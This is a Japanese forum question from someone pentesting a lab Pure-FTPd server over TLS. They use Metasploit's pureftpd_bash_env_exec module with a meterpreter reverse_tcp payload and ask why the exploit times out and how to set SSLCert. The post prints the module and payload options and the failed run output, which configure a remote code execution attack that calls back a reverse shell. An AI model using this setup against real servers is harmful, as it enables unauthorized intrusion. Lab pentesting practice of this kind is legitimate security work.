Metasploit を使用して、FTP サーバーを使用するラボの侵入テストを行っています。クライアントは FTP サーバーに接続して認証できます。しかし、私の悪用はできません。
FTP Server:
* Ubuntu 20.4
* Pure-FTPd
* Configured to use SSL/TLS
Client:
* Ubuntu 20.4
* [set ftp:ssl-force true] used to enable SSL
* [telnet <ftp-server-ip> 21] used to connect to FTP server
Metasploit モジュールのオプション:
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS <ftp-server-ip> yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 21 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
chine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST <msf-server-ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Metasploit で、SSL
設定をtrue
にすると、 という警告が表示されます[!] Changing the SSL option's value may require changing RPORT!
。に変更しようとしました443
が、エクスプロイトを実行すると、次のようになります。
[*] Started reverse TCP handler on <msf-server-ip>:4444
[-] <ftp-server-ip>:443 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (<ftp-server-ip>:443) timed out.
[*] Exploit completed, but no session was created.
私の推測では、SSLCert の設定を変更する必要がありますが、set ftp:ssl-force true
コマンドを使用した場合、SSLCert をどのパスに設定すればよいでしょうか?